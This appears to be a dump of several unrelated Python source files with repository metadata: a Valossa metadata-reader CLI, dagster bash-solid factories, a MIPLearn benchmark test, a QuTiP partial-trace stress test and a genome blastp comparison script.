            "-p", "--detection-persons", "--similar-to", default=None, metavar="PERSON",
            help=("Comma-separated list of person names to read. Example: "
                  "\"<NAME>,*Willis\"")
        )
        parser.add_argument(
            "-i", "--detection-valossa-cid", default=None, metavar="ID",
            help="Valossa Concept ID to read. Example: \"sEl5Jb8H_WG7\""
        )
        parser.add_argument(
            "--detection-external-concept-id", nargs=2, action=ValidateExternalOntology, metavar=("ONTOLOGY", "ID"),
            help=("Name of external ontology followed by Concept ID to read. "
                  "Example: gkg \"/m/01j61q\"")
        )
        parser.add_argument(
            "--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
            help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
                  "entries below 0.5 confidence. Note that some detection types does not have confidence "
                  "field and in that case this argument is ignored.")
        )
        parser.add_argument(
            "--sort-by", default="detection_id",
            choices=["prominence", "detection_id"],
            help="Sort by selected method. Default: sort by detection ID"
        )
        parser.add_argument(
            "--extra-header", nargs="+",
            choices=["similar_to", "gender", "text"],
            help="Use this option to select extra headers for output."
        )
    @staticmethod
    def list_detections_by_second(parser):
        """Register arguments for the ``list-detections-by-second`` sub-command."""
        parser.add_argument(
            "metadata_file", type=input_metadata,
            help="Valossa Core metadata file to examine"
        )
        parser.add_argument(
            "--output-file", default=None, metavar="FILE",
            help="Output results to FILE instead of stdout."
        )
        parser.add_argument(
            "-f", "--output-format",
            default="csv", choices=["csv", "free", "srt"],
            help="Choose one of the supported output formats."
        )
        parser.add_argument(
            "-t", "--detection-types", default=None,
            metavar="TYPE", nargs="+",
            help="Space-separated list of detection types to read."
        )
        parser.add_argument(
            "-c", "--category", default=None,
            metavar="CATEGORY", nargs="+",
            help=("Space separated list of categories. Asterisk (*) "
                  "wildcards can be used. If used from shell, remember to use "
                  "quotation marks with asterisk. Example: human.face,\"*iab*\"")
        )
        parser.add_argument(
            "-l", "--detection-label", default=None, metavar="LABEL",  # TODO: Output occurrences too?
            help=("Detection label to read. "
                  "Example: dog")
        )
        parser.add_argument(
            "-p", "--detection-persons", "--similar-to", default=None, metavar="PERSON",
            help=("Comma-separated list of person names to read. Example: "
                  "\"<NAME>,*Willis\"")
        )
        parser.add_argument(
            "-i", "--detection-valossa-cid", default=None, metavar="ID",
            help="Valossa Concept ID to read. Example: \"sEl5Jb8H_WG7\""
        )
        parser.add_argument(
            "--detection-external-concept-id", nargs=2, action=ValidateExternalOntology, metavar=("ONTOLOGY", "ID"),
            help=("Name of external ontology followed by Concept ID to read. "
                  "Example: gkg \"/m/01j61q\"")
        )
        parser.add_argument(
            "--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
            help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
                  "entries below 0.5 confidence. Note that some detection types does not have confidence "
                  "field and in that case this argument is ignored.")
        )
        # Time-window options; main() reconciles start/length/end with each other.
        parser.add_argument(
            "--start-second", type=int, default=0,
            help=("Specifies the start-position of the examined time interval as seconds from "
                  "beginning (default: 0)")
        )
        parser.add_argument(
            "--length-seconds", type=int, default=None,
            help=("Specifies the length of the examined time interval as seconds. If left out, "
                  "then all remaining seconds after the --start-second position are examined")
        )
        parser.add_argument(
            "--end-second", type=int, default=None,
            help=("Specifies the end-position of the examined time interval as seconds from "
                  "beginning (default: until the end of video)")
        )
        parser.add_argument(
            "--short", action="store_true",
            help=("Shorter version. Each row has timestamp followed by labels detected at that time. Note that each "
                  "row has variable amount of labels so csv might not be as usable.")
        )
        parser.add_argument(
            "--sentiment", action="store_true",
            help=("List sentimental data in the core metadata file. Sentiment Analysis is not currently"
                  "part of the Core Capabilities, so be sure to enable it beforehand.")
        )
        parser.add_argument(
            "--extra-header", nargs="+",
            choices=["similar_to", "gender", "valence", "text"],
            help="Use this option to select extra headers for output."
        )
    @staticmethod
    def list_categories(parser):
        """Register arguments for the ``list-categories`` sub-command."""
        parser.add_argument(
            "metadata_file", type=input_metadata,
            help="Valossa Core metadata file to examine"
        )
        parser.add_argument(
            "--output-file", default=None, metavar="FILE",
            help="Output results to FILE instead of stdout."
        )
        parser.add_argument(
            "-f", "--output-format",
            default="csv", choices=["csv", "free"],
            help="Choose one of the supported output formats."
        )
        parser.add_argument(
            "-t", "--detection-types", default=None,
            metavar="TYPE", nargs="+",
            help="Space-separated list of detection types to read."
        )
        parser.add_argument(
            "-c", "--category", default=None,
            metavar="CATEGORY", nargs="+",
            help="Space separated list of categories."
        )
        parser.add_argument(
            "--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
            help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
                  "entries below 0.5 confidence. Note that some detection types does not have confidence "
                  "field and in that case this argument is ignored.")
        )
        parser.add_argument(
            "--start-second", type=int, default=0,
            help=("Specifies the start-position of the examined time interval as seconds from "
                  "beginning (default: 0)")
        )
        parser.add_argument(
            "--length-seconds", type=int, default=None,
            help=("Specifies the length of the examined time interval as seconds. If left out, "
                  "then all remaining seconds after the --start-second position are examined")
        )
        parser.add_argument(
            "--end-second", type=int, default=None,
            help=("Specifies the end-position of the examined time interval as seconds from "
                  "beginning (default: until the end of video)")
        )
        parser.add_argument(
            "-n", "--n-most-longest", type=positive_int, metavar="N",
            help="List only N longest categories "  # TODO: from each detection type
        )
    @staticmethod
    def list_occurrences(parser):
        """Register arguments for the ``list-occurrences`` sub-command."""
        parser.add_argument(
            "metadata_file", type=input_metadata,
            help="Valossa Core metadata file to examine"
        )
        parser.add_argument(
            "--output-file", default=None, metavar="FILE",
            help="Output results to FILE instead of stdout."
        )
        parser.add_argument(
            "-f", "--output-format",
            default="csv", choices=["csv", "free"],
            help="Choose one of the supported output formats."
        )
        parser.add_argument(
            "-t", "--detection-types", default=None,
            metavar="TYPES", nargs="+",
            help="Space-separated list of detection types to read."
        )
        parser.add_argument(
            "-c", "--category", default=None,
            metavar="CATEGORY", nargs="+",
            help="Space separated list of category tags."
        )
        parser.add_argument(
            "-l", "--detection-label", default=None, metavar="LABEL",  # TODO: Output occurrences too?
            help=("Detection label to read. "
                  "Example: dog")
        )
        parser.add_argument(
            "-p", "--detection-persons", "--similar-to", default=None, metavar="PERSON",
            help=("Comma-separated list of person names to read. Example: "
                  "\"<NAME>,*Willis\"")
        )
        parser.add_argument(
            "-i", "--detection-valossa-cid", default=None, metavar="ID",
            help="Valossa Concept ID to read. Example: \"sEl5Jb8H_WG7\""
        )
        parser.add_argument(
            "--detection-external-concept-id", nargs=2, action=ValidateExternalOntology, metavar=("ONTOLOGY", "ID"),
            help=("Name of external ontology followed by Concept ID to read. "
                  "Example: gkg \"/m/01j61q\"")
        )
        parser.add_argument(
            "--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
            help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
                  "entries below 0.5 confidence. Note that some detection types does not have confidence "
                  "field and in that case this argument is ignored.")
        )
        # NOTE: unlike the other list modes, these time-window options are floats.
        parser.add_argument(
            "--start-second", type=float, default=None,
            help=("Specifies the start-position of the examined time interval as seconds from "
                  "beginning (default: 0)")
        )
        parser.add_argument(
            "--length-seconds", type=float, default=None,
            help=("Specifies the length of the examined time interval as seconds. If left out, "
                  "then all remaining seconds after the --start-second position are examined")
        )
        parser.add_argument(
            "--end-second", type=float, default=None,
            help=("Specifies the end-position of the examined time interval as seconds from "
                  "beginning (default: until the end of video)")
        )
        parser.add_argument(
            "--sort-by", default=None,
            choices=["start_second", "valence", "duration"],
            help=("Sort by selected method. Items that do not have selected property will not be "
                  "listed at all. Default: sort by detection ID")
        )
        parser.add_argument(
            "--extra-header", nargs="+",
            choices=["valence", "similar_to", "text"],
            help="Use this option to select extra headers for output."
        )
    @staticmethod
    def metadata_info(parser):
        """Register arguments for the ``metadata-info`` sub-command."""
        parser.add_argument(
            "metadata_file", type=input_metadata,
            help="Valossa Core metadata file to examine"
        )
        parser.add_argument(
            "--output-file", default=None, metavar="FILE",
            help="Output results to FILE instead of stdout."
        )
        parser.add_argument(
            "-f", "--output-format",
            default="free", choices=["csv", "free"],
            help="Choose one of the supported output formats."
        )
    @staticmethod
    def summary(parser):
        """Register arguments for the ``summary`` sub-command."""
        parser.add_argument(
            "metadata_file", type=input_metadata,
            help="Valossa Core metadata file to examine"
        )
        parser.add_argument(
            "--output-file", default=None, metavar="FILE",
            help="Output results to FILE instead of stdout."
        )
        parser.add_argument(
            "-f", "--output-format",
            default="csv", choices=["csv", "free"],
            help="Choose one of the supported output formats."
        )
        parser.add_argument(
            "-t", "--detection-type", default=None, metavar="TYPE",
            # choices={"visual.context", "audio.context", "human.face"},
            help="Detection type to read"
        )
        parser.add_argument(
            "-c", "--category", default=None,
            metavar="CATEGORY", nargs="+",
            help=("Category tag to read. All available category tags can be found at "
                  "apidocs: https://portal.valossa.com/portal/apidocs#detectioncategories.")
        )
        parser.add_argument(
            "-n", "--n-most-prominent-detections-per-type", type=positive_int, metavar="N",
            help=("List only N most prominent detections from each detection type, "
                  "N given by user")  # TODO: Word prominent might be bad here.
        )
        parser.add_argument(
            "--separate-face-identities", action="store_true",
            help=("Summary merges human.face identities with same similar_to -field. "
                  "Use this if you wish to prevent this merging.")
        )
        parser.add_argument(
            "--skip-unknown-faces", action="store_true",
            help="Remove the human.face detections missing similar_to -field from listing."
        )
        parser.add_argument(
            "--emotion", action="store_true",
            help="Show available emotion data."
        )
    @staticmethod
    def plot(parser):
        """Register arguments for the ``plot`` sub-command.

        Exactly one plot type (--bar-summary / --transcript-sentiment-graph /
        --face-sentiment-graph) is required; -n and -t become required only
        when --bar-summary is on the command line.
        """
        parser.add_argument(
            "metadata_file", type=input_metadata,
            help="Valossa Core metadata file to examine"
        )
        parser.add_argument(
            "--output-file", default=None, metavar="FILE",
            help="Output results to FILE instead of stdout."
        )
        parser.add_argument(
            "-f", "--output-format",
            default=None,
            help=("Choose one of the supported output formats. Supported formats depend "
                  "on your system configuration.")
        )
        parser.add_argument(
            "--min-confidence", type=restricted_float, default=None, metavar="FLOAT",
            help=("Specify minimum confidence from 0.5 to 1. Valossa metadata does not have "
                  "entries below 0.5 confidence. Note that some detection types does not have confidence "
                  "field and in that case this argument is ignored.")
        )
        required_arguments = parser.add_argument_group("required arguments")
        plot_type = required_arguments.add_mutually_exclusive_group(required=True)
        plot_type.add_argument(
            "--bar-summary", action="store_true",
            help=("Gives presentation of detection time of each label in chosen type "
                  "as bar chart.")
        )
        plot_type.add_argument(
            "--transcript-sentiment-graph", action="store_true",
            help="If you have enabled sentimental analysis, you can use this to output valence and intensity images."
        )
        plot_type.add_argument(
            "--face-sentiment-graph", action="store_true",
            help=("If you have enabled sentimental analysis, you can use this to output facial valence each in their "
                  "own image file.")
        )
        # Bar-plot, required arguments
        required_bar_plot = parser.add_argument_group("required arguments for bar-summary")
        required_bar_plot.add_argument(
            "-n", "--n-most-prominent-detections-per-type", type=positive_int, required="--bar-summary" in sys.argv,
            metavar="N",
            help=("List only N most prominent detections from chosen detection type, "
                  "N given by user")
        )
        required_bar_plot.add_argument(
            "-t", "--detection-type", default=None, metavar="TYPE",
            # choices={"visual.context", "audio.context", "human.face"},
            required="--bar-summary" in sys.argv,
            help="Detection type to read"
        )
        # Plot, optional arguments
        # plot_file = parser.add_mutually_exclusive_group()
        # plot_file.add_argument(
        #     "--output-file", default=None,
        #     help="Choose filename to save result to. Output format will be parsed from "
        #          "filename. If filename is already taken program will add (n) after the name."
        # )
        parser.add_argument(
            "--image-size", default=None, type=image_size,
            help="Resolution in pixels"
        )
        # Bar-plot, optional arguments
        parser.add_argument(
            "--separate-face-identities", action="store_true",
            help=("On default merges human.face identities with same similar_to -field. "
                  "Use this if you wish to prevent this merging.")
        )
        parser.add_argument(
            "--skip-unknown-faces", action="store_true",
            help="Remove the human.face detections missing similar_to -field from listing."
        )
        # Plot trans/face, optional arguments
        parser.add_argument(
            "--simple", action="store_true",
            help="Create 'trinary' image with three values being 'positive', 'neutral' and 'negative'"
        )
        parser.add_argument(
            "--show-title", action="store_true",
            help="Read video title from metadata and insert to image."
        )
def parse_user_arguments():
    """Parse given arguments and return parsed arguments

    Builds the top-level argparse parser, registers one sub-parser per mode
    via the AddArguments helpers, and parses sys.argv.

    :return: Dictionary containing the arguments (includes the chosen "mode")
    """
    parser = argparse.ArgumentParser(
        prog="metareader",
        description="Helper tool to read Valossa Core metadata.",
        epilog=("A few example commands:\n"
                "metareader summary metadata_example.json -f free -n10\n"
                "metareader list-detections metadata_example.json -t\"visual.context\""),
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    # dest="mode" records which sub-command was selected; main() dispatches on it.
    subparsers = parser.add_subparsers(dest="mode", metavar="MODE", help="Select one of the following modes.")
    subparsers.required = True
    # LIST-DETECTIONS
    # ---------------
    list_detections = subparsers.add_parser(
        "list-detections",
        help="List detections without looking into the by_second structure."
    )
    AddArguments.list_detections(list_detections)
    # LIST-DETECTIONS-BY-SECOND
    # -------------------------
    list_detections_by_second = subparsers.add_parser(
        "list-detections-by-second",
        help=("List detections for each second, by looking into the by_second "
              "structure (note: this obviously lists only time-bound detections, "
              "so for example IAB categories are NOT listed in this mode).")
    )
    AddArguments.list_detections_by_second(list_detections_by_second)
    # LIST-CATEGORIES
    # ---------------
    list_categories = subparsers.add_parser(
        "list-categories",
        help="List category tags."
    )
    AddArguments.list_categories(list_categories)
    # LIST-OCCURRENCES
    # ---------------
    list_occurrences = subparsers.add_parser(
        "list-occurrences",
        help="List all occurrences for one or multiple detections."
    )
    AddArguments.list_occurrences(list_occurrences)
    # SUMMARY
    # -------
    summary = subparsers.add_parser(
        "summary",
        help=("Create summary view of detections based on total occurrence time of the detections. "
              "Percent values are related to total length of the video.")
    )
    AddArguments.summary(summary)
    # PLOT
    # ----
    plot = subparsers.add_parser(
        "plot",
        help="Plot chosen metadata type into bar chart. Output will be saved to a file."
    )
    AddArguments.plot(plot)
    # METADATA-INFO
    # -------------
    metadata_info = subparsers.add_parser(
        "metadata-info",
        help="List information about metadatafile"
    )
    AddArguments.metadata_info(metadata_info)
    # argcomplete.autocomplete(parser)  # TODO: configure argcomplete for Valossa detection types etc.
    args = parser.parse_args()
    return vars(args)
def plot_handler(mdr, **kwargs):
    """Fetch the requested plot data from *mdr*, draw it, and return an exit code.

    :param mdr: MetadataReader-object
    :param kwargs: parsed command-line arguments
    :return: exit code for main function (0 on success, 1 if no plot type matched)
    :rtype: int
    """
    from . import mdplotter

    if kwargs.get("show_title"):
        # Pass the video title through so the plotter can render it.
        kwargs["video_title"] = mdr.video_title

    if kwargs.get("bar_summary"):
        summary_rows = mdr.list_summary(addition_method="union", **kwargs)
        mdplotter.MetadataPlotter(**kwargs).plot(next(summary_rows)["summary"])
        return 0

    if kwargs.get("transcript_sentiment_graph") or kwargs.get("face_sentiment_graph"):
        # Get data
        sentiment_data = mdr.list_sentiment(**kwargs)
        # Plot data
        mdplotter.MetadataPlotter(**kwargs).plot(sentiment_data, **kwargs)
        return 0

    return 1
def load_blacklist():
    """Locate and load blacklist.json.

    Modify ``candidate_paths`` below for adding more possible locations and
    their checking order. Returns ``(path, parsed_json)`` for the first
    loadable file, or ``(None, None)`` when none is found -- removing the
    file is a valid way to disable the blacklist.
    """
    candidate_paths = [
        os.path.join(USER_BASE, "metareader", "blacklist.json"),
        os.path.join(os.path.dirname(os.path.realpath(__file__)), "blacklist.json"),
        os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), "blacklist.json"),
    ]
    for candidate in candidate_paths:
        if not os.path.exists(candidate):
            continue
        try:
            return candidate, load_json(candidate)
        except ValueError as err:
            # blacklist.json exists but is malformed, perhaps customer edited it?
            # Tell the user how to recover and stop.
            print("blacklist.json not formatted correctly. You can either remove\n"
                  "the blacklist.json, restore it by reinstalling the software or\n"
                  "fix the format problem with following information from the decoder:\n"
                  "%s" % err, file=sys.stderr)
            sys.exit(1)
            # raise err from None  # Works only for Python 3
        except IOError:  # Python 3: FileNotFoundError
            # Could not read the file (IO-related error); fall through to the
            # next candidate location.
            if __dev__:
                raise
    return None, None
def main(**arguments):
    """Run the selected metareader mode with the parsed arguments.

    Dispatches on arguments["mode"], streams the resulting rows through the
    printer matching arguments["output_format"], and writes either to stdout
    or to arguments["output_file"].

    :param arguments: dict produced by parse_user_arguments()
    :raises RuntimeError: on reader errors or an unsupported print mode
    """
    from . import mdreader
    from . import mdprinter
    bl_path, blacklist = load_blacklist()
    if blacklist is not None:
        logger.debug("Loaded blacklist file from %s" % bl_path)
    else:
        logger.debug("Failed loading blacklist file from %s" % bl_path)
    # Create instance of mdr = MetadataReader(json) with metadata-json as argument
    mdr = mdreader.MetadataReader(arguments.pop('metadata_file'), blacklist=blacklist)
    # Depending on arguments, call mdr.function(arguments).
    mode = arguments.pop('mode')
    if mode == 'list-detections':
        list_generator = mdr.list_detections(**arguments)
    elif mode == 'list-detections-by-second':
        # Make sure all three match, discard "length_seconds" if all three given:
        if arguments.get("start_second") and arguments.get("end_second"):
            arguments["length_seconds"] = arguments["end_second"] - arguments["start_second"]
        elif arguments.get("start_second") and arguments.get("length_seconds"):
            arguments["end_second"] = arguments["start_second"] + arguments["length_seconds"]
        elif arguments.get("length_seconds") and arguments.get("end_second"):
            arguments["start_second"] = arguments["end_second"] - arguments["length_seconds"]
        list_generator = mdr.list_detections_by_second(**arguments)
    elif mode == 'list-categories':
        list_generator = mdr.list_categories(**arguments)
    elif mode == 'list-occurrences':
        list_generator = mdr.list_occurrences(**arguments)
    elif mode == 'summary':
        list_generator = mdr.list_summary(**arguments)
    elif mode == 'plot':
        ex_code = plot_handler(mdr, **arguments)
        sys.exit(ex_code)
    elif mode == 'metadata-info':
        mdr.metadata_info()
        sys.exit(0)
    else:
        # Fixed: previous message concatenated the mode without a separator.
        print("Error: Mode not supported: " + mode, file=sys.stderr)
        sys.exit(1)
    try:
        first_row = next(list_generator)
    except mdreader.AppError as e:
        raise RuntimeError("Error: " + str(e))
    except StopIteration:
        # No rows produced for the given filters; nothing to print.
        return
    #
    # Set up printing method:
    print_mode = arguments.get('output_format', None)
    # Give the header row for printer:
    if arguments.get('output_file') is None:
        output_file = sys.stdout
    else:
        output_file = open(arguments.get('output_file'), "w", encoding="utf-8")
    if print_mode == 'csv':
        printer = mdprinter.MetadataCSVPrinter(first_row, output_file)
    elif print_mode == 'free':
        printer = mdprinter.MetadataFreePrinter(first_row, output_file)
    elif print_mode == 'srt':
        printer = mdprinter.MetadataSubtitlePrinter(first_row, output_file)
    else:
        if output_file is not sys.stdout:
            output_file.close()
        raise RuntimeError("Error: Print mode not supported", print_mode)
    if arguments.get("short", False) and mode == 'list-detections-by-second':
        for row in list_generator:
            printer.print_line(row, combine=1)
    else:
        for row in list_generator:
            printer.print_line(row)
    if output_file is not sys.stdout:
        output_file.close()
if __name__ == '__main__':
    cmd_line_args = parse_user_arguments()
    try:
        main(**cmd_line_args)
    except IOError as e: # Python 2 doesn't have BrokenPipeError
        if e.errno != errno.EPIPE:
            # Not a broken pipe
            raise
        # Broken pipe (e.g. output piped to `head`) is silently ignored.
        pass
| 3 | 3 |
werkit/compute/__init__.py | metabolize/werk | 2 | 12765066 | """
Werkit's compute wrapper provides a structured, framework-agnostic execution
environment for running any Python code and validating its result using
[1schema][] (or plain JSON Schema). It automatically catches and serializes
errors, too.
By plugging in a werkit.compute.Destination object, you can, upon completion, send
the result to a queue (or any other destination, such as S3).
[1schema]: https://github.com/metabolize/1schema/
"""
from ._destination import Destination # noqa: F401
from ._manager import Manager # noqa: F401
from ._schema import Schema # noqa: F401
| 1.820313 | 2 |
python_modules/libraries/dagster-bash/dagster_bash/solids.py | flowersw/dagster | 3 | 12765067 | <gh_stars>1-10
import os
from dagster import (
Enum,
EnumValue,
Failure,
Field,
InputDefinition,
Noneable,
Nothing,
OutputDefinition,
Permissive,
check,
solid,
)
from .utils import execute, execute_script_file
def bash_command_solid(bash_command, name='bash_solid', input_defs=None, **kwargs):
    '''Factory that builds a solid executing the given Bash command.

    Remaining kwargs are forwarded to the underlying :func:`@solid
    <dagster.solid>` decorator; overriding ``config`` or ``output_defs`` is not
    supported. Wrap the result in :func:`@composite_solid
    <dagster.composite_solid>` if you need different config fields.

    Examples:

    .. literalinclude:: ../../../../../python_modules/libraries/dagster-bash/dagster_bash_tests/example_bash_command_solid.py
       :language: python

    Args:
        bash_command (str): The shell command to execute.
        name (str, optional): The name of this solid. Defaults to "bash_solid".
        input_defs (List[InputDefinition], optional): input definitions for the solid. Defaults to
            a single Nothing input.

    Raises:
        Failure: Raised when the shell command returns a non-zero exit code.

    Returns:
        SolidDefinition: Returns the constructed solid definition.
    '''
    check.str_param(bash_command, 'bash_command')
    name = check.str_param(name, 'name')
    check.opt_list_param(input_defs, 'input_defs', of_type=InputDefinition)

    # config and output_defs are fixed by this factory and may not be overridden.
    if 'output_defs' in kwargs:
        raise TypeError('Overriding output_defs for bash solid is not supported.')
    if 'config' in kwargs:
        raise TypeError('Overriding config for bash solid is not supported.')

    @solid(
        name=name,
        description=kwargs.pop('description', 'A solid to invoke a bash command.'),
        input_defs=input_defs or [InputDefinition('start', Nothing)],
        output_defs=[OutputDefinition(str, 'result')],
        config=bash_solid_config(),
        **kwargs
    )
    def _invoke_bash_command(context):
        # Run the captured command with the solid's runtime config (env, cwd, logging).
        output, return_code = execute(
            bash_command=bash_command, log=context.log, **context.solid_config
        )
        if return_code:
            raise Failure(
                description='Bash command execution failed with output: {output}'.format(
                    output=output
                )
            )
        return output

    return _invoke_bash_command
def bash_script_solid(bash_script_path, name='bash_script_solid', input_defs=None, **kwargs):
    '''This function is a factory which constructs a solid that will execute a Bash command read
    from a script file.

    Any kwargs passed to this function will be passed along to the underlying :func:`@solid
    <dagster.solid>` decorator. However, note that overriding ``config`` or ``output_defs`` is not
    supported.

    You might consider using :func:`@composite_solid <dagster.composite_solid>` to wrap this solid
    in the cases where you'd like to configure the bash solid with different config fields.

    Examples:

    .. literalinclude:: ../../../../../python_modules/libraries/dagster-bash/dagster_bash_tests/example_bash_script_solid.py
       :language: python

    Args:
        bash_script_path (str): The script file to execute.
        name (str, optional): The name of this solid. Defaults to "bash_script_solid".
        input_defs (List[InputDefinition], optional): input definitions for the solid. Defaults to
            a single Nothing input.

    Raises:
        Failure: Raised when the shell command returns a non-zero exit code.

    Returns:
        SolidDefinition: Returns the constructed solid definition.
    '''
    check.str_param(bash_script_path, 'bash_script_path')
    name = check.str_param(name, 'name')
    check.opt_list_param(input_defs, 'input_defs', of_type=InputDefinition)

    # config and output_defs are fixed by this factory and may not be overridden.
    if 'output_defs' in kwargs:
        raise TypeError('Overriding output_defs for bash solid is not supported.')
    if 'config' in kwargs:
        raise TypeError('Overriding config for bash solid is not supported.')

    @solid(
        name=name,
        # Fixed copy-paste: this factory wraps a script, not an inline command.
        description=kwargs.pop('description', 'A solid to invoke a bash script.'),
        input_defs=input_defs or [InputDefinition('start', Nothing)],
        output_defs=[OutputDefinition(str, 'result')],
        config=bash_solid_config(),
        **kwargs
    )
    def _bash_script_solid(context):
        output, return_code = execute_script_file(
            bash_script_path=bash_script_path, log=context.log, **context.solid_config
        )
        if return_code:
            raise Failure(
                description='Bash command execution failed with output: {output}'.format(
                    output=output
                )
            )
        return output

    return _bash_script_solid
def bash_solid_config():
    """Return the config schema shared by the bash command and script solids.

    Fields:
        env: environment variables for the subprocess (defaults to a copy of
            os.environ taken at definition time).
        output_logging: STREAM / BUFFER / NONE handling of stdout+stderr.
        cwd: working directory for the subprocess.
    """
    return {
        'env': Field(
            Noneable(Permissive()),
            default_value=os.environ.copy(),
            is_required=False,
            description='An optional dict of environment variables to pass to the subprocess. '
            'Defaults to using os.environ.copy().',
        ),
        'output_logging': Field(
            Enum(
                name='OutputType',
                enum_values=[
                    EnumValue('STREAM', description='Stream script stdout/stderr.'),
                    EnumValue(
                        'BUFFER',
                        description='Buffer bash script stdout/stderr, then log upon completion.',
                    ),
                    EnumValue('NONE', description='No logging'),
                ],
            ),
            is_required=False,
            default_value='BUFFER',
        ),
        'cwd': Field(
            Noneable(str),
            default_value=None,
            is_required=False,
            description='Working directory in which to execute bash script',
        ),
    }
| 2.6875 | 3 |
tests/test_benchmark.py | neuyhwu/MIPLearn | 64 | 12765068 | # MIPLearn: Extensible Framework for Learning-Enhanced Mixed-Integer Optimization
# Copyright (C) 2020-2021, UChicago Argonne, LLC. All rights reserved.
# Released under the modified BSD license. See COPYING.md for more details.
import os.path
from scipy.stats import randint
from miplearn.benchmark import BenchmarkRunner
from miplearn.problems.stab import MaxWeightStableSetGenerator
from miplearn.solvers.learning import LearningSolver
def test_benchmark() -> None:
    """End-to-end check of BenchmarkRunner with 1 and 4 worker processes."""
    for n_jobs in [1, 4]:
        # Generate training and test instances
        generator = MaxWeightStableSetGenerator(n=randint(low=25, high=26))
        train_instances = generator.generate(5)
        test_instances = generator.generate(3)

        # Solve training instances
        training_solver = LearningSolver()
        training_solver.parallel_solve(train_instances, n_jobs=n_jobs)  # type: ignore

        # Benchmark
        test_solvers = {
            "Strategy A": LearningSolver(),
            "Strategy B": LearningSolver(),
        }
        benchmark = BenchmarkRunner(test_solvers)
        benchmark.fit(train_instances, n_jobs=n_jobs)  # type: ignore
        benchmark.parallel_solve(
            test_instances,  # type: ignore
            n_jobs=n_jobs,
            n_trials=2,
        )
        # Results should be written to CSV: 3 instances x 2 solvers x 2 trials = 12 rows.
        benchmark.write_csv("/tmp/benchmark.csv")
        assert os.path.isfile("/tmp/benchmark.csv")
        assert benchmark.results.values.shape == (12, 21)
| 2.34375 | 2 |
stress_tests/python/ptrace_qutip.py | Harmohit-Singh/qpp | 2 | 12765069 | <reponame>Harmohit-Singh/qpp
# QuTiP partial trace stress tests
import os
import sys
import timeit

if len(sys.argv) != 3:
    sys.exit("Please specify the number of cores and qubits!")

num_cores = int(sys.argv[1])  # number of cores
n = int(sys.argv[2])  # number of qubits
N = 2 ** n  # Hilbert-space dimension for n qubits

# BLAS thread caps must be exported BEFORE qutip (and hence numpy) is imported:
# OpenBLAS/MKL read these variables when the library is loaded, so setting them
# after the import (as the previous version did) has no effect.
os.environ['OPENBLAS_NUM_THREADS'] = str(num_cores)
os.environ['MKL_NUM_THREADS'] = str(num_cores)

import qutip

qutip.settings.num_cpus = num_cores

# Random Hermitian operator with an explicit n-qubit tensor structure.
result = qutip.rand_herm(N, dims=[[2] * n, [2] * n])

# start timing
start_time = timeit.default_timer()

# partial trace over the first qubit
result = result.ptrace(range(1, n))

elapsed = timeit.default_timer() - start_time
# end timing

print("{0}, {1}, {2}".format(num_cores, n, elapsed))
| 2.359375 | 2 |
Recipes/g2g_blastp.py | allista/BioUtils | 1 | 12765070 | <filename>Recipes/g2g_blastp.py
#!/usr/bin/python
# coding=utf-8
'''
Created on Dec 19, 2015
@author: <NAME> <<EMAIL>>
'''
import os
import signal
from time import sleep
from BioUtils.NCBI import BlastCLI
from reportlab.lib import colors
from BioUtils.Tools.tmpStorage import roDict, clean_tmp_files, shelf_result
_pid = -1
abort_event = None
def sig_handler(signum, frame):
    """Signal handler: abort running operations and clean temporary files.

    Only acts in the original main process (workers inherit the handler but
    must not run the cleanup). Fix: the first parameter was named ``signal``,
    shadowing the ``signal`` module; handlers are invoked positionally, so
    renaming it is safe.
    """
    if _pid != os.getpid():
        return
    print('\nAborting. This may take some time '
          'as not all operations could be stopped immediately.\n')
    abort_event.set()
    sleep(0.1)  # give workers a moment to observe the abort flag
    clean_tmp_files()
#end def
# NOTE(review): this script is Python 2 (bare print statements below); it
# will not run under Python 3 without modification.
if __name__ == '__main__':
    from multiprocessing import Event
    from BioUtils.Tools.Output import user_message
    from BioUtils.SeqUtils import load_files
    _pid = os.getpid()
    # setup signal handlers so INT/TERM/QUIT abort cleanly (see sig_handler)
    signal.signal(signal.SIGINT, sig_handler)
    signal.signal(signal.SIGTERM, sig_handler)
    signal.signal(signal.SIGQUIT, sig_handler)
    # "if True" is a manual toggle used while developing this analysis
    if True:
        # from DegenPrimer import MultiprocessingBase
        # MultiprocessingBase.cpu_count = 1
        abort_event = Event()
        lb = BlastCLI(abort_event)
        with user_message('Loading genomes...', '\n'):
            genomes_dir = u'/home/allis/Dropbox/Science/Микра/Thermococcus/sequence/GenBank/Thermococcus'
            genome_names = ['Thermococcus_barophilus_Ch5-complete.gb',
                            'Thermococcus_onnurineus_NA1-complete-genome.gb',
                            'Thermococcus_sp._ES1.gb',
                            'Thermococcus-DS1-preliminary.gb']
            genomes = load_files(abort_event, [os.path.join(genomes_dir, f) for f in genome_names], 'gb')
        # first genome is the reference, the rest are blast subjects
        ref = genomes[0]
        subj = genomes[1:]
        # cache the expensive genome-to-genome blastp result in a shelf file
        @shelf_result
        def g2g2shelf():
            return lb.g2g_blastp(ref, subj, 11, features_of_interest=[{'ugene_name': 'FC-full'}, {'ugene_name': 'COC-full'}])
        g2g_res = '/tmp/DP-PCR-N_KAEs'
        if not os.path.isfile(g2g_res):
            # no cached shelf on disk: run the blastp and use the new path
            g2g_res = g2g2shelf()
            print g2g_res
        if g2g_res:
            with roDict(g2g_res) as db:
                results = db['result']
            if results:
                lb.g2g_to_csv('g2g_test.csv', ref, subj, results)
        print 'Done.'
        import numpy as np
        import pandas
        import matplotlib.pyplot as plt
        from matplotlib import cm, rc
        df = pandas.read_csv('g2g_test.csv')
        # keep only genes that have hits in both subject genomes
        df = df.dropna(subset=('Thermococcus_onnurineus_NA1_percent', 'Thermococcus_sp._ES1_percent'))
        ratio = 15/18.0
        rc('text', usetex=True)
        rc('font', size=14)
        rc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})
        fig, ax = plt.subplots(figsize=(12,12*ratio))
        ax.set_xlabel(r'\textit{Thermococcus paralvinellae} \textsf{ES1}', fontsize=18)
